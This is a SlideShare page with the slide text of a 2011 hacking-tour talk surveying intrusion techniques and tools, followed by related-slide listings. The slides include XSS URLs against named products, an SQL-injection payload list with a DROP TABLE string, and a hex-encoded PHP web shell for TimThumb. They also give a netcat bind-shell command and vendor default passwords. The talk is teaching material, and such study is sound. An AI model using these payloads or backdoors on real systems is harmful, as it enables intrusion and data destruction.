SlideShare uma empresa Scribd logo

"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

SegInfo
SegInfo
Tecnologia
1 de 32
Baixar para ler offline
Intrusion Techniques DcLabs Hacking Tour 2011 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
повестка дня отпечатков пальцев Веб-ошибок Задняя дверь грубая сила шеллкод Эксплойты Сканеры Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Don't Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrint Matrix: Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrint U. Bourne Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
FingerPrint In BackTrack Linux you can find many softwares to Finger-Print Http://www.backtrack-linux.com Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E LMS Web Ensino – TOTVS http://site/lms/sistema/webensino/index.php? modo=resbusca_biblioteca&pChave=a%22%2F%3E+ %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E &Submit=Buscar Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability Reflected / Stored Xss DEMO Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
What is the impact? Why? Examples? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;-- ' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fan Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Web Vulnerability CGI/PHP Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts OneorZero – AFU + LFI http://server/oneorzero/index.php?controller=../[FILE].php WordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security - Pass: security FireBird: User: sysdba - Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.secunia.com www.exploit-db.com 0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$ Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Exploits If Kernel was patched? Will we cry? Alexos=> Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose: nc –vv –l –p 5555 nc –vv –l –p 5555 –e /bin/bash nc <ip> <port> RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities W3af Nessus Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark - Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
MetaSploit Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
MetaSploit Let´s Fuck Windows? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Questions? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Contact Crash - crash@dclabs.com.br Irc: irc.freenode.net #dclabs twitter: @crashbrz Ewerson Guimarães (Crash) DcLabs – HackingTour 2011

Recomendados

Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEShakacon
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session iMalachi Jones
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 

Recomendados

Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEShakacon
 
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)
TENTACLE: Environment-Sensitive Malware Palpation(PacSec 2014)FFRI, Inc.
 
Embedded device hacking Session i
Embedded device hacking Session iEmbedded device hacking Session i
Embedded device hacking Session iMalachi Jones
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...DefconRussia
 
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat Security Conference
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitDimitry Snezhkov
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Fuzzing
FuzzingFuzzing
FuzzingKhalegh Salehi
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoCodemotion
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the CorePeter Hlavaty
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaCODE BLUE
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas FerreiraSegInfo
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaLuiz Sales Rabelo
 

Mais conteúdo relacionado

Mais procurados

Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Mauricio Velazco
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...DefconRussia
 
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat Security Conference
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitDimitry Snezhkov
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoCodemotion
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaCODE BLUE
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 

Mais procurados (20)

Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
 
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
Nikita Abdullin - Reverse-engineering of embedded MIPS devices. Case Study - ...
 
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
BlueHat v17 || KERNELFAULT: R00ting the Unexploitable using Hardware Fault In...
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution Toolkit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Fuzzing
FuzzingFuzzing
Fuzzing
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 

Destaque

"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas FerreiraSegInfo
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaLuiz Sales Rabelo
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano MirandaSegInfo
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoJunior Abreu
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaLuiz Sales Rabelo
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013SegInfo
 

Destaque (9)

"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
 
Oficina Integradora - Daryus Impacta
Oficina Integradora - Daryus ImpactaOficina Integradora - Daryus Impacta
Oficina Integradora - Daryus Impacta
 
Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012Palestra CGU - BSB Jan/2012
Palestra CGU - BSB Jan/2012
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu ProveitoRede Sociais: Usando a Ferramenta Para o Seu Proveito
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
 
Processo investigativo - Faculdader Impacta
Processo investigativo - Faculdader ImpactaProcesso investigativo - Faculdader Impacta
Processo investigativo - Faculdader Impacta
 
Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013Convite de Patrocinio Workshop Seginfo 2013
Convite de Patrocinio Workshop Seginfo 2013
 
Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012Palestra MPDF BSB Mar/2012
Palestra MPDF BSB Mar/2012
 
CNASI 2011
CNASI 2011CNASI 2011
CNASI 2011
 

Semelhante a "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Enterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) DemoEnterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) Demojasoncallaway
 
Reverse Engineering 101
Reverse Engineering 101Reverse Engineering 101
Reverse Engineering 101ysurer
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsAntiy Labs
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsJan Seidl
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Security Weekly
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsDr. Ramchandra Mangrulkar
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environmentThe bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environmentAlienVault
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 

Semelhante a "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por (20)

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Enterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) DemoEnterprise Linux Exploit Mapper (ELEM) Demo
Enterprise Linux Exploit Mapper (ELEM) Demo
 
Reverse Engineering 101
Reverse Engineering 101Reverse Engineering 101
Reverse Engineering 101
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Security Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and SystemsSecurity Challenges of Antivirus Engines, Products and Systems
Security Challenges of Antivirus Engines, Products and Systems
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
 
